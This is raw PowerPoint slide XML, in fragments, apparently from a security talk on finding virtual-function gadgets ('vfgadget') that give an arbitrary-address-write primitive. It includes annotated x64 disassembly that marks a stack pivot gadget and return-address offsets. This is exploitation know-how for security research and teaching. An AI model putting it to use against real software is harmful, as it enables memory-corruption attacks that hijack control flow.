            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Goal : Find a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>vfgadget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t> of this form</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>This will give a one QWORD AAW primitive</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2113847761"/>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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Finding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>an AAW </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>vfgadget</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8005665" y="1"/>
            <a:ext cx="4186335"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8369559" y="1856778"/>
            <a:ext cx="3618722" cy="3293209"/>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dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>test_function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(){</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AEAEAE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="AEAEAE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>looooooooooooot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AEAEAE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> of things going on here.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>classA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>field1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>testfield</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>field2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AEAEAE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// A lot more things.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>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9" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="279918" y="1825625"/>
            <a:ext cx="7522028" cy="4855093"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Goal : Find a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>vfgadget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t> of this form</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>This will give a one QWORD AAW primitive</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3715895472"/>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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>The AAW </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>vfgadget</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6344815" y="1"/>
            <a:ext cx="5847185"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6512768" y="1100999"/>
            <a:ext cx="5587481" cy="4616648"/>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400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sub_404C690 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>proc</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near</a:t>
            </a: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400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</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rcx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a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rdi+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D8FA3C"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>18h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="AEAEAE"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AEAEAE"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0x18 =&gt; 0x800</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movsxd</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rdx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err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rcx+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D8FA3C"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0Ch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AEAEAE"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="AEAEAE"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AEAEAE"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 0x80C =&gt; 0</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xor</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eax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eax</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cmp</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edx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a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rcx+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D8FA3C"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>8</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           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="AEAEAE"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="AEAEAE"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AEAEAE"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 0x808 =&gt; 1</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jge</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     short locret_404C6D2</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mov</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rax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rcx</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          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="AEAEAE"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AEAEAE"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0x800 =&gt; 0x810</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shl</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rdx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a:solidFill>
                  <a:srgbClr val="D8FA3C"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>4</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mov</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rax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rax+rdx</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          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="AEAEAE"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AEAEAE"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0x810 =&gt; Stack Pivot Gadget</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mov</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rdx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a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rdi+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D8FA3C"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>28h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="AEAEAE"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AEAEAE"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0x28 =&gt; ret </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="AEAEAE"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>addr</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mov</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rdx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]</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rax</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mov</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rax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rcx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]</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movsxd</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rdx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err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
